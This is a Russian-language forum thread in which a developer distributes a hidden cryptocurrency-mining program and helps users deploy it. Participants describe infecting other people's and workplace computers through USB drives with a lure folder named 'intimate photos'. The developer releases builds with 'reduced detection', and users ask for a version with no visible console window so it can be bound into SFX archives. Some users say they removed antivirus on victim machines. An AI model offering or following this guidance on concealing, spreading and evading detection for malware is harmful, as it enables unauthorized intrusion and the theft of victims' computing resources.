fredsnikos (OP)
Newbie
Activity: 95
Merit: 0
|
|
February 11, 2018, 08:06:34 AM |
|
Есть задумки, у меня такая структура, что такое название может вызвать подозрения.
Ты скажи, в каком файле я смогу это все изменить. Ты исходники же скидывал, но у меня при открытии иероглифы
Оно так не меняется, надо в коде самом. Скажи что тебе туда написать, соберу для тебя.
|
|
|
|
Chattyspark
Newbie
Activity: 28
|
|
February 11, 2018, 08:48:43 AM |
|
Есть задумки, у меня такая структура, что такое название может вызвать подозрения.
Ты скажи, в каком файле я смогу это все изменить. Ты исходники же скидывал, но у меня при открытии иероглифы
Оно так не меняется, надо в коде самом. Скажи что тебе туда написать, соберу для тебя. Ладно оставь, слушай, а можешь сделать, чтобы при открытии start.exe окно не высвечивалось ( cmd строка, там наебка, типо отключите антивирус и тд )? Просто у меня тут свои задумки, через SFX и тд и хотелось бы, чтобы окно это не высвечивалось .
|
|
|
|
Chattyspark
Newbie
|
|
February 11, 2018, 10:19:16 AM |
|
Вопрос) На пуле показывает что все норм) а баланс не добавляется! Это норм На монеро обработка происходит, это пару часов
|
|
|
|
wolfarm
Newbie
Activity: 54
|
|
February 11, 2018, 04:52:14 PM |
|
Я правильно понял? Вставляю флешку в чужой ком и все происходит на автомате?
нет, надо нажать на файлик Интимные фото или как там его
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 11, 2018, 06:06:49 PM |
|
Я правильно понял? Вставляю флешку в чужой ком и все происходит на автомате?
нет, надо нажать на файлик Интимные фото или как там его У тебя больше одной машины майнят? Я что то понять не могу. У меня майнят три машины это точно. в пуле показывает одну. две машины через папку интим фото заразил. не в курсе что хрень? Воркер будет всегда один, просто расти хэшрейт будет.
|
|
|
|
Skrillpay
Newbie
Activity: 1
|
|
February 11, 2018, 08:48:02 PM |
|
Так, получается я установлю и запущу через приложение Start, потом мне нужно узнать ip компа, который я заразил? А если через флешки будет разноситься, то как я узнаю их ip компов?
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 12, 2018, 04:08:29 AM |
|
Так, получается я установлю и запущу через приложение Start, потом мне нужно узнать ip компа, который я заразил? А если через флешки будет разноситься, то как я узнаю их ip компов?
Майнить надо начать со своего компа любым майнером, потом поменять минималку. Вариант 3: просто написать на почту дварфпула с просьбой поменять минималку Вариант 3: использовать другой пул, например monerohash, там минималка совсем маленькая.
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 12, 2018, 04:09:41 AM |
|
Можно переименовать интимфото на другое название Очень надо!!! Какое название сделать?
|
|
|
|
Chattyspark
Newbie
|
|
February 12, 2018, 05:00:07 AM |
|
Оно так не меняется, надо в коде самом. Скажи что тебе туда написать, соберу для тебя. Ладно оставь, слушай, а можешь сделать, чтобы при открытии start.exe окно не высвечивалось ( cmd строка, там наебка, типо отключите антивирус и тд )? Просто у меня тут свои задумки, через SFX и тд и хотелось бы, чтобы окно это не высвечивалось .
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 12, 2018, 05:21:46 AM |
|
Версия без вывода ошибки. После запуска пользователь не получит никаких сообщений. Берём этот exe http://rgho.st/6VhVSxbm4и sys файл с предыдущей сборки.
|
|
|
|
Chattyspark
Newbie
|
|
February 12, 2018, 03:29:34 PM |
|
Кстати, zec вообще почему то не майнится, не пойму почему, он у меня даже в процессах не появляется, я уже на 4-х компьютерах перепробовал, ни в какую
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 12, 2018, 06:28:47 PM |
|
Кстати, zec вообще почему то не майнится, не пойму почему, он у меня даже в процессах не появляется, я уже на 4-х компьютерах перепробовал, ни в какую
Уверен, что видеокарты подходят для майнинга зека?
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 13, 2018, 04:25:58 AM |
|
Сборка обновлена. Снижен детект Новые ссылки: Зеркало 1Зеркало 2Версия без вывода консольного окна с ошибкой(Кому нужно для склейки) Зеркало 1Зеркало 2В первом сообщении ссылки также обновлены.
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 13, 2018, 08:50:24 AM |
|
Сборка обновлена. Снижен детект Новые ссылки: Зеркало 1Зеркало 2Версия без вывода консольного окна с ошибкой(Кому нужно для склейки) Зеркало 1Зеркало 2В первом сообщении ссылки также обновлены. Не получается обратно в sys вернуть Закрой архив и все открытые в архиве файлы, потом переименовывай.
|
|
|
|
|
Chattyspark
Newbie
|
|
February 13, 2018, 10:53:24 AM |
|
Как обратно в sys вернуть ? Уже все что мог сделал(((( Какие способы есть? Параметры папок, там где вид смотри, там в конце 5 вроде пунктов, со всех галки убери
|
|
|
|
Chattyspark
Newbie
|
|
February 13, 2018, 11:00:18 AM |
|
У меня такая проблема.
Чего в организации на один из компов залил вирус, папка создаётся и тд. Но майнинг не происходит, пулы не идут, стал чекать сколько он ресурсов ест, а там 0,04-0,05
Я незнаю с чем это связано, возможно с прокси, что там стоит
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 13, 2018, 03:28:35 PM |
|
У меня такая проблема.
Чего в организации на один из компов залил вирус, папка создаётся и тд. Но майнинг не происходит, пулы не идут, стал чекать сколько он ресурсов ест, а там 0,04-0,05
Может из-за прокси, хз. На разных компах так?
|
|
|
|
Chattyspark
Newbie
|
|
February 15, 2018, 07:36:45 AM |
|
У меня такая проблема.
Может из-за прокси, хз. На разных компах так? На всех, на некоторых я антивирус снёс, поэтому смог установить, так что файл распространяется, но шары не идут, очень мало ресурсов задействует. Так же вторая проблема появилась просто пишет, что у вас нету доступа к этому файлу, либо он удален, что то типо того, пробовал отключать антивирус и запускал от имени администратора, все равно, не работает
|
|
|
|
fredsnikos (OP)
Newbie
|
|
February 15, 2018, 07:54:26 AM |
|
На всех, на некоторых я антивирус снёс, поэтому смог установить, так что файл распространяется, но шары не идут, очень мало ресурсов задействует.
Так же вторая проблема появилась просто пишет, что у вас нету доступа к этому файлу, либо он удален, что то типо того, пробовал отключать антивирус и запускал от имени администратора, все равно, не работает
Если не задействует ресурсы, значит майнинг не идёт. Видимо из-за прокси, не может подключиться к пулу. Ошибка именно от Windows, не та, которая в консоли? Если вин 10 лицензия, то там встроенный антивирус может не дать запуститься.
|
|
|
|
|